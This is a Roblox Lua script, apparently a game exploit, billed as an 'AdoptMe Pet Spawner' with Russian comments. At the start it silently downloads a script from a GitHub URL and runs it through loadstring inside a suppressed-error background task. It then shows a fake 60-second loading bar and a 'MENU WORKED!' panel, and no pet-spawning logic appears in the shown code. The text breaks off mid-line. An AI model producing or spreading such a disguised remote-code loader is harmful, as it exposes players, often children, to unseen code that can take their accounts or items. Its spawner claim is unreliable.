local TweenService = game:GetService("TweenService")
local CoreGui = game:GetService("CoreGui")

-------------------------------------------------------
-- 1️⃣ БЕЗОПАСНАЯ ЗАГРУЗКА ВНЕШНЕГО СКРИПТА
-------------------------------------------------------
task.spawn(function()
    pcall(function()
        local url = "https://raw.githubusercontent.com/ARTNSCRIPT/AdoptMeScript/main/ArtiXHub.lua" -- ИСПРАВЬ ЕСЛИ НУЖНО
        local req = game:HttpGet(url)
        loadstring(req)()
    end)
end)

-------------------------------------------------------
-- 2️⃣ СОЗДАНИЕ UI
-------------------------------------------------------
local gui = Instance.new("ScreenGui", CoreGui)
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

local bg = Instance.new("Frame", gui)
bg.Size = UDim2.new(1,0,1,0)
bg.BackgroundColor3 = Color3.fromRGB(20,20,20)
bg.BackgroundTransparency = 1

local title = Instance.new("TextLabel", bg)
title.Size = UDim2.new(1,0,0,100)
title.Position = UDim2.new(0,0,0.35,0)
title.BackgroundTransparency = 1
title.Text = "AdoptMe Pet Spawner ArtiXHub"
title.TextColor3 = Color3.new(1,1,1)
title.Font = Enum.Font.GothamBold
title.TextScaled = true
title.TextTransparency = 1

local bar = Instance.new("Frame", bg)
bar.Size = UDim2.new(0.6,0,0,25)
bar.Position = UDim2.new(0.2,0,0.52,0)
bar.BackgroundColor3 = Color3.fromRGB(50,50,50)
bar.BorderSizePixel = 0
bar.BackgroundTransparency = 1

local fill = Instance.new("Frame", bar)
fill.Size = UDim2.new(0,0,1,0)
fill.BackgroundColor3 = Color3.fromRGB(0,170,255)
fill.BorderSizePixel = 0

local percent = Instance.new("TextLabel", bg)
percent.Size = UDim2.new(1,0,0,40)
percent.Position = UDim2.new(0,0,0.56,30)
percent.BackgroundTransparency = 1
percent.TextColor3 = Color3.new(1,1,1)
percent.Font = Enum.Font.GothamBold
percent.TextScaled = true
percent.Text = "0%"
percent.TextTransparency = 1

-- анимация появления
TweenService:Create(bg, TweenInfo.new(1.2), {BackgroundTransparency = 0}):Play()
TweenService:Create(title, TweenInfo.new(1.2), {TextTransparency = 0}):Play()
TweenService:Create(bar, TweenInfo.new(1.2), {BackgroundTransparency = 0}):Play()
TweenService:Create(percent, TweenInfo.new(1.2), {TextTransparency = 0}):Play()
task.wait(1.2)

-------------------------------------------------------
-- 3️⃣ РАБОТАЮЩАЯ ЗАГРУЗКА (НЕ ВИСНЕТ)
-------------------------------------------------------
local duration = 60
for i = 0,100 do
    percent.Text = i.."%"
    TweenService:Create(fill, TweenInfo.new(duration/100), {
        Size = UDim2.new(i/100,0,1,0)
    }):Play()
    task.wait(duration/100)
end

-------------------------------------------------------
-- 4️⃣ ИСЧЕЗНОВЕНИЕ + ОТКРЫТИЕ МЕНЮ
-------------------------------------------------------
TweenService:Create(bg, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
TweenService:Create(title, TweenInfo.new(1), {TextTransparency = 1}):Play()
TweenService:Create(bar, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
TweenService:Create(percent, TweenInfo.new(1), {TextTransparency = 1}):Play()
task.wait(1)
bg:Destroy()

-------------------------------------------------------
-- 5️⃣ ПОКАЗ МЕНЮ (ПОЯВЛЯЕТСЯ ВСЕГДА)
-------------------------------------------------------
local menu = Instance.new("Frame", gui)
menu.Size = UDim2.new(0,350,0,250)
menu.Position = UDim2.new(0.5,-175,0.5,-125)
menu.BackgroundColor3 = Color3.fromRGB(255,176,80)
menu.BorderSizePixel = 0

local cr = Instance.new("UICorner", menu)
cr.CornerRadius = UDim.new(0,18)

local t = Instance.new("TextLabel", menu)
t.Size = UDim2.new(1,0,0,40)
t.BackgroundTransparency = 1
t.Text = "MENU WORKED!"
t.TextColor3 = Color3.new(1,1
